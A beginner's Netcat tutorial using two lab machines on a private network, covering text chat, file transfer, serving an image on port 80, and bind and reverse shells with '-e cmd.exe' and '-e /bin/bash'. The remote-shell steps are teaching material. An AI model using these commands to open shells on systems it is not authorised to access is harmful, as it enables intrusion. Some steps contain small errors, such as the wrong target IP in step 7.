Netcat is an awesome network tool, which can be used for pretty much anything network related. File transfers, remote access, tunneling and network debugging is some of the common tasks it is often used for. Netcat is found for both nix and Windows systems. In this tutorial, we are going be using Netcat as a simple chat client, for file transfers, webserver and remote access. We will be using two systems, a Windows 7 client with the IP of 192.168.1.100 and a Linux client with the IP of 192.168.1.115.
1. Open an command prompt on the Windows client and type nc –lvp 2222
This will tell Netcat to start Listing Verbosely on Port 2222. There are no specific reason for using this port, just randomly chosen. We will now ask the Linux client to connect the IP of the Windows client on port 2222.
2. In a Shell from the Linux client type nc 192.168.1.100 2222
3. Type Hello World and press Enter
4. Go back to the Windows Command Prompt and type Hack the Gibson and press Enter
We are able to transfer raw text from one system to another via TCP/IP on a specific port. Let’s try transferring a file instead. We do this by telling Netcat on the Linux client to Listing Verbosely on Port 1717 and output > whatever data transferred to a file called test.txt. Then we ask Netcat on the Windows client to connect to the IP of 192.168.1.115 and input < at file contain some text called test.txt.
5. On the Linux client type nc -lvp 1717 > test.txt
6. On the Windows client create a file call text.txt and input the text This is a test
7. Type nc 192.168.1.100 1717 < test.txt
The data is now transferred and saved to the file test.txt on the Linux client. Now open up the file and check that the data was transferred.
8. Press Ctrl+C to close the open connection
9. On the Linux client type nano test.txt
We can see that the text This is a test was transferred from the Windows client to the Linux client. Now that we know how to do this, we can try to input a picture on port 80 – the port normally used for web traffic – and thereby use Netcat as a web server. In this tutorial, we are using the picture cool.jpg.
10. On the Linux client type nc -lvp 80 < cool.jpg
11. From the windows client open a web browser and go to http://192.168.1.115/
The picture is shown in the web browser. Note that a lot of information about the connection is shown in the terminal window, just like a real web server would log web traffic. We are now going to have a look at how to create a remote shell from the Linux client to the Windows clients’ command prompt. We are going to do this by binding the command prompt to Netcat with the –e cmd.exe parameter. This time we randomly pick the port 1337.
12. From the Windows client type nc -lvp 1337 -e cmd.exe
13. From the Linux client type nc 192.168.1.100 1337
We now have a remote shell for the Windows system running via Netcat. Now try that the other way around, to make a remote shell to the Linux Clients bash shell from the Windows client. We are going to do this by binding the bash shell with the –e /bin/bach parameter on port 7777.
14. From the Windows client type nc -lvp 7777
15. From the Linux client type nc -nv 192.168.1.100 7777 -e /bin/bash
16. From the Windows client type pwd to confirm the connection was made
We can see that we are in the /root directory indicating that we do in fact have remote shell access to the Linux client.
Netcat is often referred to as the TCP/IP Swiss Army knife, since it capabilities is, close to, only limited by the TCP/IP protocol and your imagination. It’s a really handy tool to know how to work with when you are doing anything networking related.